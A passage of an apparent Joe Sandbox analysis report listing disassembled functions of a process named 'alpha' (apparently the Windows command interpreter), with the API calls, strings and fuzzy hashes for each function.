                                                                                                                                                                        • API String ID: 1103618819-1745581171
                                                                                                                                                                        • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                        • Instruction ID: 47520710922e795082ad09df19d14116405759848b6d01ecb7e8523afbc95497
                                                                                                                                                                        • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                        • Instruction Fuzzy Hash: D4415A63A08A86C2EB108F15941037D77A0FF59B94F859235DE8D93395EF3EE48ACB05
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$_wcslwr
                                                                                                                                                                        • String ID: [%s]
                                                                                                                                                                        • API String ID: 886762496-302437576
                                                                                                                                                                        • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                                                                                        • Instruction ID: 0fbe20811b56e966fd51a0ec1b9ba4f4419f30eb2e92b78cb4392bd057d91923
                                                                                                                                                                        • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                                                                                        • Instruction Fuzzy Hash: DE314432705B82C6EB21CF6198507E967A0FB89B88F444135DA8D8BB59DF3DD249C705
APIs
• Part of subcall function 00007FF6E94333A8: iswspace.MSVCRT(?,?,00000000,00007FF6E944D6EE,?,?,?,00007FF6E9440632), ref: 00007FF6E94333C0
• iswspace.MSVCRT(?,?,?,00007FF6E94332A4), ref: 00007FF6E943331C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: iswspace
• String ID: off
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: %s=%s$DPATH$PATH
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: wcscmp
• String ID: *.*$????????.???
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: fprintf
• String ID: CMD Internal Error %s$%s$Null environment
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: iswspacewcschr
• String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: KERNEL32.DLL$SetThreadUILanguage
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                        • API String ID: 1646373207-919018592
                                                                                                                                                                        • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                        • Instruction ID: 879303bdce57081be220346704e39568e07aaa056935504c64b557d5d746009b
                                                                                                                                                                        • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                        • Instruction Fuzzy Hash: F4F01722A28A91D2EB008F52F444179AA60EF89BD0B48D134DE4E43B24DF2DD489C705
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$CurrentDirectorytowupper
• String ID:
• API String ID: 1403193329-0
• Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
• Instruction ID: 8ad38b903e8f9b079c184c2ab16aa7460fd6f2ccc089c843bba554d5355a8ee3
• Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
• Instruction Fuzzy Hash: 6F618633A18B82CAEB20CF6598443AD37A4FF88748F504234DE5D83A99DF39E488C705
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsnicmp$wcschr
• String ID:
• API String ID: 3270668897-0
• Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
• Instruction ID: 3449684335960348f667fd80a5d01d8fc85f229102757b5bfde7ee772540f907
• Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
• Instruction Fuzzy Hash: 9E519213E08647C2FB61EF31E4143BA67A1EF55B80F588131CA0E872D5EE2ED949C35A
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$DriveFullNamePathType
• String ID:
• API String ID: 3442494845-0
• Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
• Instruction ID: 0e419a2cc110c796e263f3cc3a9f5a93498d58994fd1c2c2254e8e23082c4cda
• Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
• Instruction Fuzzy Hash: 45318833605B82CAEB70CF21E8447E973A4FB88B88F444165EA4D87B54CF39D649C740
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
• Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
• Instruction ID: ec5f7931e08bf8a5c144b2ca98a60e5f235a49b2c9384a899b2e166248c67cee
• Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
• Instruction Fuzzy Hash: D141A736A08B42C5EB50AF58F89436973A4FF88754F904136EA8D83764DF3EE588C706
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: wcstol$lstrcmp
• String ID:
• API String ID: 3515581199-0
• Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
• Instruction ID: 102b020dda3e5c6f78ed5cba9d673e975f9b1b4cf65044e928723ee8c7997356
• Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
• Instruction Fuzzy Hash: 0E21C133A08642C3E765CF79A0982BEAAA0FF99740F115134CB4F82B55DE6EE449C709
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: File_get_osfhandle$TimeWrite
• String ID:
• API String ID: 4019809305-0
• Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
• Instruction ID: cc74e970302297cb8e084bb59ef66d44abd3c1d6049c194e05ac91940806b8cb
• Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
• Instruction Fuzzy Hash: B6318F23A08782C6EBA18F24944433CA7A1BF4AB90F145238DD4D83B95DF3ED849CB09
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$DriveNamePathTypeVolume
• String ID:
• API String ID: 1029679093-0
• Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
• Instruction ID: d76174854c5d93daf8b6f9d006a490a417991de8bc5c74c54fd3ad10354c6f02
• Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
• Instruction Fuzzy Hash: F6314533705B81CAEB318F61D8943E967A1FB89B88F444135CA8D8BB48DF39D649C705
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2448200120-0
                                                                                                                                                                        • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                        • Instruction ID: 2e5f37370cd4ff91ddd52fd84490beb94a35e796783d37bd7289fa10e6d7268e
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F21FB73A18746C6EB159F11A80037EB6A1FF89B81F544139E94E83795CF3EE449CB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                        • Instruction ID: 31086827c7193903c486b25dd5bbad5c63f6343762749ca994455b82a7778093
                                                                                                                                                                        • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                        • Instruction Fuzzy Hash: F621A472A08B46C6EA04DF61A9441B97BA1FF89BD0B049230DE5E837A5EF3DE409C705
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E9433D0C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: towupper.MSVCRT ref: 00007FF6E9433D2F
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: iswalpha.MSVCRT ref: 00007FF6E9433D4F
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: towupper.MSVCRT ref: 00007FF6E9433D75
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9433DBF
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9426ABF
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9426AD3
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6E9426AE8,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B8B
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6E9426AE8,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B97
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B84: RtlFreeHeap.NTDLL ref: 00007FF6E9426BAF
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9426AF1,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B39
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B30: RtlFreeHeap.NTDLL ref: 00007FF6E9426B4D
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9426AF1,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B59
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9426B03
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9426B17
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3512109576-0
                                                                                                                                                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                        • Instruction ID: 23ce1be0056c7fe227dc4f94e2deeb969b17616cb3320d4c40f024db73ebf4b4
                                                                                                                                                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                        • Instruction Fuzzy Hash: B1218E63A09A86C6EB04DF6594543B87BA0FF59B45F148032CA0EC7355EF3EA44AC31A
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B6D0
                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B6E7
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B701
                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B715
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$AllocSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2549470565-0
                                                                                                                                                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                        • Instruction ID: d7072537c0516c7a496935c98e734932356321587ea3ed7546fa5a7b06870fbb
                                                                                                                                                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B211F77A09782C6EA148F55E440278BAA5FF89B80B589431DA0E83754EF3DE849C709
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6E943507A), ref: 00007FF6E944D01C
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6E943507A), ref: 00007FF6E944D033
                                                                                                                                                                        • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6E943507A), ref: 00007FF6E944D06D
                                                                                                                                                                        • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6E943507A), ref: 00007FF6E944D07F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1033415088-0
                                                                                                                                                                        • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                        • Instruction ID: 0bd1109ec152bb91007adf23513439937f33e269e154185c32b2bf1502d2d5ef
                                                                                                                                                                        • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D114C32618A42C6DB449F20B05427AB7A0FF8AB99F405135EA8E87B54DF3DD049CB04
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9431EA0: wcschr.MSVCRT(?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6E9450D54), ref: 00007FF6E9431EB3
                                                                                                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9425A2E
                                                                                                                                                                        • _open_osfhandle.MSVCRT ref: 00007FF6E9425A4F
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94437AA
                                                                                                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6E94437D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 22757656-0
                                                                                                                                                                        • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                                                                        • Instruction ID: f344c2a5420e7fc26c62ae9c4d372a9979713732cf21eb42542b7505db8790ad
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                                                                        • Instruction Fuzzy Hash: BF116D72A18645CBE7108F28E44833D7AA0FB89B64F648734DA2A873D0DF3ED449CB05
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6E9445433,?,?,?,00007FF6E94469B8,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94456C5
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E94456D9
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6E9445433,?,?,?,00007FF6E94469B8,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94456FD
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9445711
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
